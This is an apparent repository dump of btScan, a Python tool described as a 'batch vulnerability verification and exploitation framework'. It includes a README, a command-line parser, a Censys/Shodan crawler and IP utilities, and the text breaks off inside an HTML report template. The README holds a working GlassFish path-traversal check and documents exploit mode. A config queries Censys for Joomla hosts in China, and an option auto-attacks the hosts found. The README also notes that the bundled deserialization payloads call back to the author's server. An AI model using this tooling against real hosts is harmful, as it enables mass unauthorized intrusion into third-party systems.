├── README.md ├── __init__.py ├── btScan.py ├── conf └── scan_rule.ini ├── crawl ├── NetSearch.py ├── __init__.py └── search_rule.ini ├── doc ├── crawl.txt ├── lib.txt └── node.txt ├── lib ├── __init__.py ├── __init__.pyc ├── cmdline.py ├── cmdline.pyc ├── include.py ├── include.pyc ├── ipparse.py ├── ipparse.pyc ├── report.py ├── report.pyc ├── scancore.py ├── scancore.pyc ├── scanframe.py ├── scanframe.pyc ├── scriptframe.py └── scriptframe.pyc ├── node ├── __init__.py ├── __init__.pyc ├── ext │ ├── ParseUrl.py │ ├── ParseUrl.pyc │ ├── __init__.py │ └── __init__.pyc ├── fortigate.py ├── fortigate.pyc ├── glassfish.py ├── glassfish.pyc ├── gres_weak.py ├── jboss_ser.py ├── jboss_ser.pyc ├── jenkins_ser.py ├── joomla.py ├── joomla.pyc ├── juniperBackdoor.py ├── redis_weak_ssh.py ├── static │ ├── jboss_poc.bin │ ├── jenkins_poc.bin │ ├── sshkey.txt │ └── weblogic_poc.bin ├── weblogic_ser.py └── weblogic_ser.pyc ├── report └── btscan_20151226_000414.html ├── requirements.txt └── screenshot ├── exploit.png └── verify.png /README.md: -------------------------------------------------------------------------------- 1 | ## 目录结构 2 | 3 | --lib 核心文件库 4 | 5 | --report 报告生成的文件夹 6 | 7 | --node 里面每一个py文件是一个攻击向量,添加扫描节点也是向里面添加文件 8 | 9 | --crawl 通过空间搜索引擎抓取url或者ip的脚本 10 | 11 | 12 | ## 使用方法 13 | python btScan.py 14 | usage: btScan.py [options] 15 | 16 | * batch vulnerability verification and exploition framework. * 17 | By he1m4n6a 18 | 19 | optional arguments: 20 | -h, --help show this help message and exit 21 | -t THREADS Num of scan threads for each scan process, 20 by default 22 | -m MODE select mode [config|script] 23 | e.g. -m script 24 | -n NAME from node floder choose a script 25 | -c COMMAND give an instruction when use script mode [verify|exploit] 26 | e.g. -c verify 27 | -u URL_FILE input url file 28 | -i IP_FILE input ip file 29 | -autoIP get ip from space search engine and auto attack 30 | -autoURL get url from space search engine and auto attack 31 | -v show program's version number and exit 32 | 33 | 脚本存在两种验证模式,一种是通过加载模块,另一种是通过配置文件。复杂的可以通过加载脚本,简单的通过加载配置文件即可。然后攻击也有两种模式,验证verify模式和攻击exploit模式。 你也可以指定ip或者url作为输入格式,也可以自动获取ip或者url,那就是配合crawl文件下的网络空间抓取模块。 34 | 35 | **示例** 36 | ``` 37 | python btscan.py -n joomla -m script -c verify -u url.txt 38 | -n 指定node文件夹下的joomla.py,-m指定为script模式,即指定加载模块的模式。-c指定模式为验证,仅为验证就好了,-u指定输入为url的模式。 39 | ``` 40 | ``` 41 | python btscan.py -n joomla -m script -c exploit -u url.txt 42 | 同上,只是指定为攻击模式。 43 | ``` 44 | ``` 45 | python btscan.py -m config -c verify -i ip.txts 46 | -m指定为config模式,-c指定为验证模式,-i指定输入的为ip模式,仅需通过conf目录下的scan_rule.ini的配置就够了。 47 | ``` 48 | 49 | 50 | ## 插件编写规则 51 | 52 | 仅需要在node文件夹下新增一个py文件 53 | 54 | py文件中重要的有两个函数verify和exploit函数,没有exploit攻击模式,仅需要verify函数,返回值有三个值,第一个值是返回是否存在漏洞,返回True或者False;第二个值是返回url,第三个值返回需要打印的信息。 55 | 56 | ***示例(glassfish.py为例)*** 57 | 58 | ``` 59 | #!/usr/bin/env python 60 | #coding=utf8 61 | 62 | import requests 63 | 64 | def verify(ip): 65 | url = 'https://' + str(ip) + ':4848//theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/' 66 | try: 67 | r = requests.get(url, verify=False, timeout=5) 68 | if 'ejb-timer-service-app' in r.text: 69 | msg = 'vul' 70 | return True, ip, msg 71 | else: 72 | msg = 'safe' 73 | return False, ip, msg 74 | except Exception, e: 75 | #msg = str(e) 76 | msg = 'safe' 77 | return False, ip, msg 78 | 79 | 80 | def exploit(ip): 81 | verify(ip) 82 | ``` 83 | 上面函数都可以自己定义,主要是verfiy和exploit函数,如果exploit函数和verify函数一样,exploit函数里面只要简单的调用verify(url)即可。 84 | 85 | ## 其他 86 | 87 | crwal文件夹的NetSearch.py里面的shadon和censys模块的密钥要自己填上。 88 | java反序列化的payload要自行更改,不然结果是发送到我的vps上。 89 | 90 | 有任何交流和问题可以联系我he1m4n6a@163.com 91 | -------------------------------------------------------------------------------- /__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/__init__.py -------------------------------------------------------------------------------- /btScan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding=utf8 3 | 4 | import os 5 | import glob 6 | import sys 7 | from string import Template 8 | import time 9 | import webbrowser 10 | from optparse import OptionParser 11 | from lib.cmdline import parse_args 12 | from lib.scancore import AbstractScan 13 | from lib.report import TEMPLATE_html 14 | 15 | args = parse_args() 16 | 17 | def main(): 18 | scanner = AbstractScan(args) 19 | scanner.run() 20 | 21 | if __name__ == '__main__': 22 | main() -------------------------------------------------------------------------------- /conf/scan_rule.ini: -------------------------------------------------------------------------------- 1 | [main] 2 | scan_rule = Hello, world 3 | res_rule = 4 | payload = resin-doc/examples/quercus-hello/viewfile?file=hello.php 5 | method = get -------------------------------------------------------------------------------- /crawl/NetSearch.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding=utf8 3 | 4 | import sys 5 | import os 6 | from censys import * 7 | import censys 8 | import shodan 9 | import ConfigParser 10 | sys.path.append('../lib') 11 | import include 12 | 13 | class CensysClass: 14 | #max request 120 times per 5 minutes. 15 | def __init__(self, querystr, start_page=1, max_page=10): 16 | self.api_id = "" 17 | self.api_secret = "" 18 | self.querystr = querystr 19 | self.START_PAGE = start_page 20 | self.MAX_PAGE = max_page 21 | 22 | #get ipv4 data 23 | def ipv4_data(self): 24 | reslist = [] 25 | API_ID = self.api_id 26 | API_SECRET = self.api_secret 27 | try: 28 | api = censys.ipv4.CensysIPv4(api_id=API_ID, api_secret=API_SECRET) 29 | import pdb 30 | pdb.set_trace() 31 | res = api.search(self.querystr) 32 | matches = res['metadata']['count'] 33 | pageNum = matches / 100 34 | maxPageNum = pageNum 35 | if matches % 100 != 0: 36 | pageNum = pageNum + 1 37 | pageNum = self.MAX_PAGE if pageNum > self.MAX_PAGE else pageNum 38 | count = 1 39 | while count <= pageNum: 40 | if self.START_PAGE > maxPageNum: 41 | break 42 | results = api.search(self.querystr, page=self.START_PAGE) 43 | count = count + 1 44 | self.START_PAGE = self.START_PAGE + 1 45 | for result in results.get('results'): 46 | #rr = "{0}:{1}".format(result.get("ip"), result.get('protocols')[0].split('/')[0]) 47 | rr = "{0}".format(result.get("ip")) 48 | reslist.append(str(rr)) 49 | return reslist 50 | # print reslist 51 | except Exception, e: 52 | print str(e) 53 | 54 | #get website data 55 | def websites_data(self): 56 | reslist = [] 57 | API_ID = self.api_id 58 | API_SECRET = self.api_secret 59 | try: 60 | api = censys.websites.CensysWebsites(api_id=API_ID, api_secret=API_SECRET) 61 | res = api.search(self.querystr) 62 | matches = res['metadata']['count'] 63 | pageNum = matches / 100 64 | maxPageNum = pageNum 65 | if matches % 100 != 0: 66 | pageNum = pageNum + 1 67 | pageNum = self.MAX_PAGE if pageNum > self.MAX_PAGE else pageNum 68 | count = 1 69 | while count <= pageNum: 70 | if self.START_PAGE > maxPageNum: 71 | break 72 | results = api.search(self.querystr, page=self.START_PAGE) 73 | count = count + 1 74 | self.START_PAGE = self.START_PAGE + 1 75 | for result in results.get('results'): 76 | rr = result.get('domain') 77 | reslist.append(str(rr)) 78 | return reslist 79 | # print reslist 80 | except Exception, e: 81 | print str(e) 82 | 83 | class ShodanClass: 84 | #Free users only 100 item with 1 pages 85 | def __init__(self, querystr, MAX_PAGE=1): 86 | self.SHODAN_API_KEY = "" 87 | self.querystr = querystr 88 | self.MAX_PAGE = MAX_PAGE 89 | 90 | def raw_data(self): 91 | SHODAN_API_KEY = self.SHODAN_API_KEY 92 | reslist = [] 93 | try: 94 | api = shodan.Shodan(SHODAN_API_KEY) 95 | results = api.search(self.querystr, page=self.MAX_PAGE) 96 | for result in results['matches']: 97 | rr = "{0}:{1}".format(result['ip_str'], str(result['port'])) 98 | reslist.append(str(rr)) 99 | return reslist 100 | # print reslist 101 | except Exception, e: 102 | print str(e) 103 | 104 | 105 | class NetSearch: 106 | def __init__(self): 107 | self.conf_file = include.search_rule_dir 108 | 109 | def getData(self): 110 | try: 111 | censys_list = [] 112 | shodan_list = [] 113 | cf = ConfigParser.ConfigParser() 114 | cf.read(self.conf_file) 115 | censys_items = cf.items("censys") 116 | shodan_items = cf.items("shodan") 117 | censys_start = censys_items[0][1] 118 | censys_mode = censys_items[1][1] 119 | censys_querystr = censys_items[2][1] 120 | censys_start_page = int(censys_items[3][1]) 121 | censys_max_page = int(censys_items[4][1]) 122 | shodan_start = shodan_items[0][1] 123 | shodan_querystr = shodan_items[1][1] 124 | shodan_max_page = int(shodan_items[2][1]) 125 | # print censys_start, censys_mode, censys_querystr, censys_start_page, censys_max_page, shodan_start, shodan_querystr, shodan_max_page 126 | 127 | if censys_start == 'on': 128 | censys_class = CensysClass(censys_querystr, censys_start_page, censys_max_page) 129 | if censys_mode == "websites": 130 | censys_list = censys_class.websites_data() 131 | elif censys_mode == "ipv4": 132 | censys_list = censys_class.ipv4_data() 133 | else: 134 | msg = "error args" 135 | print msg 136 | exit(0) 137 | if shodan_start == 'on': 138 | shodan_class = ShodanClass(shodan_querystr, shodan_max_page) 139 | shodan_list = shodan_class.raw_data() 140 | 141 | if censys_list and shodan_list: 142 | rset = set(censys_list+shodan_list) 143 | return rset 144 | elif censys_list: 145 | rset = set(censys_list) 146 | return rset 147 | elif shodan_list: 148 | rset = set(shodan_list) 149 | return shodan_list 150 | else: 151 | msg = 'None result' 152 | print msg 153 | exit(0) 154 | except Exception, e: 155 | print str(e) 156 | 157 | if __name__ == '__main__': 158 | fout = open('out.txt', 'w') 159 | netsearch = NetSearch() 160 | rset = netsearch.getData() 161 | if rset != None: 162 | for s in rset: 163 | fout.write(s+'\n') 164 | else: 165 | print 'rset is none' 166 | fout.close() 167 | sys.exit() 168 | print "\ntask all over.\n" 169 | fout.close() -------------------------------------------------------------------------------- /crawl/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/crawl/__init__.py -------------------------------------------------------------------------------- /crawl/search_rule.ini: -------------------------------------------------------------------------------- 1 | [censys] 2 | start = on 3 | mode = ipv4 4 | querystr = joomla AND location.country='China' 5 | start_page = 1 6 | max_page = 100 7 | 8 | [shodan] 9 | start = off 10 | querystr = redis 11 | max_page = 1 -------------------------------------------------------------------------------- /doc/crawl.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/doc/crawl.txt -------------------------------------------------------------------------------- /doc/lib.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/doc/lib.txt -------------------------------------------------------------------------------- /doc/node.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/doc/node.txt -------------------------------------------------------------------------------- /lib/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/lib/__init__.py -------------------------------------------------------------------------------- /lib/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/lib/__init__.pyc -------------------------------------------------------------------------------- /lib/cmdline.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding=utf8 3 | 4 | import argparse 5 | import sys 6 | import os 7 | 8 | p_path = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) 9 | 10 | def check_args(args): 11 | if not args.m: 12 | msg = 'Use -m to set attack Mode' 13 | raise Exception(msg) 14 | if args.m == 'config' and args.i: 15 | msg = 'Config mode not support ip format, please use -u' 16 | if args.autoIP and args.autoURL: 17 | msg = 'Only use one auto method' 18 | raise Exception(msg) 19 | if not args.autoIP and not args.autoURL: 20 | if not args.u and not args.i: 21 | msg = 'You should choose a method assign a file' 22 | raise Exception(msg) 23 | if args.u and args.i: 24 | msg = 'Only use -u or -i assign a file' 25 | raise Exception(msg) 26 | if args.u and not os.path.isfile(args.u): 27 | msg = 'TargetFile not found: %s' %args.u 28 | raise Exception(msg) 29 | if args.i and not os.path.isfile(args.i): 30 | msg = 'TargetFile not found: %s' %args.i 31 | raise Exception(msg) 32 | if args.m == 'script' and not args.n: 33 | msg = 'Use -n to choose a script which from node floder' 34 | raise Exception(msg) 35 | if args.n and not os.path.isfile(p_path + os.sep + 'node' + os.sep + args.n + '.py'): 36 | msg = 'Script name not found: %s.py' %args.n 37 | raise Exception(msg) 38 | if args.c not in ('verify', 'exploit'): 39 | msg = 'Use -c to choose a correct command' 40 | raise Exception(msg) 41 | 42 | def parse_args(): 43 | parser = argparse.ArgumentParser(prog='btScan', 44 | formatter_class=argparse.RawTextHelpFormatter, 45 | description='* batch vulnerability verification and exploition framework. *\nBy he1m4n6a', 46 | usage='btScan.py [options]') 47 | parser.add_argument('-t', metavar='THREADS', type=int, default=20, 48 | help='Num of scan threads for each scan process, 20 by default') 49 | parser.add_argument('-m', metavar='MODE', type=str, default='', 50 | help='select mode [config|script] \ne.g. -m script') 51 | parser.add_argument('-n', metavar='NAME', type=str, 52 | help='from node floder choose a script') 53 | parser.add_argument('-c', metavar='COMMAND', type=str, default='verify', 54 | help='give an instruction when use script mode [verify|exploit]\ne.g. -c verify') 55 | parser.add_argument('-u', metavar='URL_FILE', type=str, default='', 56 | help='input url file') 57 | parser.add_argument('-i', metavar='IP_FILE', type=str, default='', 58 | help='input ip file') 59 | parser.add_argument('-autoIP', action='store_true', 60 | help='get ip from space search engine and auto attack') 61 | parser.add_argument('-autoURL', action='store_true', 62 | help='get url from space search engine and auto attack') 63 | parser.add_argument('-v', action='version', version='%(prog)s 1.0 By he1m4n6a') 64 | 65 | if len(sys.argv) == 1: 66 | sys.argv.append('-h') 67 | args = parser.parse_args() 68 | check_args(args) 69 | return args -------------------------------------------------------------------------------- /lib/cmdline.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/lib/cmdline.pyc -------------------------------------------------------------------------------- /lib/include.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding=utf8 3 | 4 | import os 5 | import sys 6 | 7 | p_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) 8 | lib_dir = os.path.dirname(os.path.abspath(__file__)) 9 | scan_rule_dir = p_dir + os.path.sep + "conf" + os.path.sep + "scan_rule.ini" 10 | crawl_dir = p_dir + os.path.sep + "crawl" 11 | search_rule_dir = crawl_dir + os.path.sep + 'search_rule.ini' 12 | 13 | sys.path.append(p_dir) 14 | sys.path.append(lib_dir) 15 | sys.path.append(crawl_dir) 16 | sys.path.append(search_rule_dir) -------------------------------------------------------------------------------- /lib/include.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/lib/include.pyc -------------------------------------------------------------------------------- /lib/ipparse.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding=utf8 3 | 4 | #parse ip 5 | class Ipparse(): 6 | # convert an IP address from its dotted-quad format to its 7 | # 32 binary digit representation 8 | def __init__(self): 9 | pass 10 | 11 | # convert a decimal number to binary representation 12 | # if d is specified, left-pad the binary number with 0s to that length 13 | @staticmethod 14 | def dec2bin(n,d=None): 15 | s = "" 16 | while n>0: 17 | if n&1: 18 | s = "1"+s 19 | else: 20 | s = "0"+s 21 | n >>= 1 22 | if d is not None: 23 | while len(s) 0: 38 | b += "00000000" 39 | outQuads -= 1 40 | return b 41 | 42 | # convert a binary string into an IP address 43 | @staticmethod 44 | def bin2ip(b): 45 | ip = "" 46 | for i in range(0,len(b),8): 47 | ip += str(int(b[i:i+8],2))+"." 48 | return ip[:-1] 49 | 50 | # print a list of IP addresses based on the CIDR block specified 51 | @staticmethod 52 | def listCIDR(c): 53 | cidrlist = [] 54 | if c.find('-') == -1: 55 | parts = c.split("/") 56 | baseIP = Ipparse.ip2bin(parts[0]) 57 | subnet = int(parts[1]) 58 | if subnet == 32: 59 | cidrlist.append(Ipparse.bin2ip(baseIP)) 60 | return cidrlist 61 | elif subnet > 32: 62 | return [] 63 | else: 64 | ipPrefix = baseIP[:-(32-subnet)] 65 | for i in range(2**(32-subnet)): 66 | cidrlist.append(Ipparse.bin2ip(ipPrefix+Ipparse.dec2bin(i, (32-subnet)))) 67 | return cidrlist 68 | else: 69 | parts = c.split('-') 70 | baseIP = parts[0].split('.') 71 | iptmp = baseIP[0] + '.' + baseIP[1] + '.' + baseIP[2] + '.' 72 | startIP = baseIP[3] 73 | endIP = parts[1] 74 | for a in range(int(startIP), int(endIP)+1): 75 | ipNew = iptmp + str(a) 76 | cidrlist.append(ipNew) 77 | return cidrlist -------------------------------------------------------------------------------- /lib/ipparse.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/lib/ipparse.pyc -------------------------------------------------------------------------------- /lib/report.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding=utf8 3 | 4 | TEMPLATE_html = """ 5 | 6 | 7 | btScan Report 8 | 13 | 14 | 15 |

16 | btscan v1.0 scan report 17 |

18 |
19 |
20 |